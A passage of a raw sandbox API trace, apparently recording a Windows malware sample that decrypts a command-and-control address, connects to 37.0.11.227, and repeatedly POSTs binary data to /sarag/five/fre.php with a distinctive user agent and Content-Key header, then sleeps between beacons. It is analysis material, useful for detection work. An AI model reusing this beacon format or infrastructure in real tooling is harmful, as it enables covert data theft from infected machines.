Flags=0x0, Size=0x201b) returned 0x6b87b8 [0256.026] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.026] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.026] GetProcessHeap () returned 0x690000 [0256.027] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0256.027] GetProcessHeap () returned 0x690000 [0256.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.028] GetProcessHeap () returned 0x690000 [0256.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0256.028] GetProcessHeap () returned 0x690000 [0256.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0256.028] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.029] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.029] GetProcessHeap () returned 0x690000 [0256.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0256.029] GetProcessHeap () returned 0x690000 [0256.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.030] send (s=0x750, buf=0x6ad508*, len=242, flags=0) returned 242 [0256.034] send (s=0x750, buf=0x6aba40*, len=159, flags=0) returned 159 [0256.035] GetProcessHeap () returned 0x690000 [0256.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0256.035] recv (in: s=0x750, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0256.113] GetProcessHeap () returned 0x690000 [0256.114] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0256.115] GetProcessHeap () returned 0x690000 [0256.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0256.116] GetProcessHeap () returned 0x690000 [0256.116] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0256.117] GetProcessHeap () returned 0x690000 [0256.117] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0256.117] closesocket (s=0x750) returned 0 [0256.118] GetProcessHeap () returned 0x690000 [0256.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0256.118] GetProcessHeap () returned 0x690000 [0256.118] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.119] GetProcessHeap () returned 0x690000 [0256.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0256.119] GetProcessHeap () returned 0x690000 [0256.119] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0256.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14ec) returned 0x750 [0256.124] Sleep (dwMilliseconds=0xea60) [0256.125] GetProcessHeap () returned 0x690000 [0256.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0256.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.147] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0256.156] GetProcessHeap () returned 0x690000 [0256.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0256.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.157] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.158] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.159] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.159] GetProcessHeap () returned 0x690000 [0256.160] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0256.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.167] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0256.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.168] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.169] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0256.169] GetProcessHeap () returned 0x690000 [0256.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.170] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.172] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.173] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.174] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.174] GetProcessHeap () returned 0x690000 [0256.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0256.174] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.174] GetProcessHeap () returned 0x690000 [0256.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0256.175] GetProcessHeap () returned 0x690000 [0256.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.175] GetProcessHeap () returned 0x690000 [0256.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0256.176] GetProcessHeap () returned 0x690000 [0256.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0256.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.177] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0256.193] GetProcessHeap () returned 0x690000 [0256.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0256.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.194] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.195] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.196] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.196] GetProcessHeap () returned 0x690000 [0256.197] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0256.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.200] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0256.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.201] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.203] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0256.203] GetProcessHeap () returned 0x690000 [0256.203] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.204] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0256.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.205] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0256.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.206] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0256.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.207] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0256.207] GetProcessHeap () returned 0x690000 [0256.207] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0256.207] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0256.208] GetProcessHeap () returned 0x690000 [0256.208] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0256.208] socket (af=2, type=1, protocol=6) returned 0x754 [0256.208] connect (s=0x754, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0256.233] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0256.233] GetProcessHeap () returned 0x690000 [0256.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0256.233] GetProcessHeap () returned 0x690000 [0256.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0256.234] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.235] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.235] GetProcessHeap () returned 0x690000 [0256.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0256.235] GetProcessHeap () returned 0x690000 [0256.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.236] GetProcessHeap () returned 0x690000 [0256.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0256.236] GetProcessHeap () returned 0x690000 [0256.236] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0256.237] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.254] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0256.254] GetProcessHeap () returned 0x690000 [0256.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0256.254] GetProcessHeap () returned 0x690000 [0256.254] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.255] send (s=0x754, buf=0x6ad508*, len=242, flags=0) returned 242 [0256.255] send (s=0x754, buf=0x6aba40*, len=159, flags=0) returned 159 [0256.255] GetProcessHeap () returned 0x690000 [0256.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0256.255] recv (in: s=0x754, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0256.332] GetProcessHeap () returned 0x690000 [0256.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0256.333] GetProcessHeap () returned 0x690000 [0256.333] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0256.333] GetProcessHeap () returned 0x690000 [0256.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0256.334] GetProcessHeap () returned 0x690000 [0256.334] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0256.334] closesocket (s=0x754) returned 0 [0256.335] GetProcessHeap () returned 0x690000 [0256.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0256.335] GetProcessHeap () returned 0x690000 [0256.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.336] GetProcessHeap () returned 0x690000 [0256.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0256.336] GetProcessHeap () returned 0x690000 [0256.337] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0256.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14f0) returned 0x754 [0256.339] Sleep (dwMilliseconds=0xea60) [0256.340] GetProcessHeap () returned 0x690000 [0256.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0256.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0256.358] GetProcessHeap () returned 0x690000 [0256.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0256.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.360] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.361] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.364] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.364] GetProcessHeap () returned 0x690000 [0256.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0256.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.366] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0256.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.367] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.368] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0256.368] GetProcessHeap () returned 0x690000 [0256.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.370] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0256.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.376] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0256.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.377] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0256.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.379] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0256.379] GetProcessHeap () returned 0x690000 [0256.379] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0256.379] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0256.379] GetProcessHeap () returned 0x690000 [0256.379] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0256.379] GetProcessHeap () returned 0x690000 [0256.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0256.380] GetProcessHeap () returned 0x690000 [0256.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0256.380] GetProcessHeap () returned 0x690000 [0256.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0256.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0256.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0256.398] GetProcessHeap () returned 0x690000 [0256.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0256.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.399] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0256.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.400] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0256.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.401] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0256.401] GetProcessHeap () returned 0x690000 [0256.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0256.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.403] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0256.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.404] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0256.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0256.408] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0256.408] GetProcessHeap () returned 0x690000 [0256.408] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0256.409] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.409] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0256.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.410] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0256.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.411] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0256.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0256.413] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0256.413] GetProcessHeap () returned 0x690000 [0256.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0256.413] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0256.413] GetProcessHeap () returned 0x690000 [0256.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0256.413] socket (af=2, type=1, protocol=6) returned 0x758 [0256.413] connect (s=0x758, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0256.442] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0256.442] GetProcessHeap () returned 0x690000 [0256.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0256.442] GetProcessHeap () returned 0x690000 [0256.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0256.443] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.444] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0256.447] GetProcessHeap () returned 0x690000 [0256.447] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0256.447] GetProcessHeap () returned 0x690000 [0256.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0256.448] GetProcessHeap () returned 0x690000 [0256.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0256.448] GetProcessHeap () returned 0x690000 [0256.448] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0256.449] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0256.451] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", 